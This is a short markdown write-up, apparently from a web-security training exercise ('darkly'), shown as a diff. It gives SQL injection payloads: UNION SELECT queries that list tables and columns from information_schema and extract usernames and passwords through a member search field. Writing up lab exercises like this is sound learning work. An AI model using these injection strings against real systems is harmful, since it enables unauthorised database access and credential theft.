riazus/darkly/01_sign_in/Ressources/breach.md

 ### Instructions

+This query returns all available columns in the db
+`1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns`
+And this query allows to check all tables
+`1 AND 1=2 UNION SELECT table_schema, table_name FROM information_schema.columns`

 We have noticed that members page has sql search input Using next query we get users creditianals
 `1 AND 1=2 UNION SELECT username, password FROM Member_Brute_Force.db_default`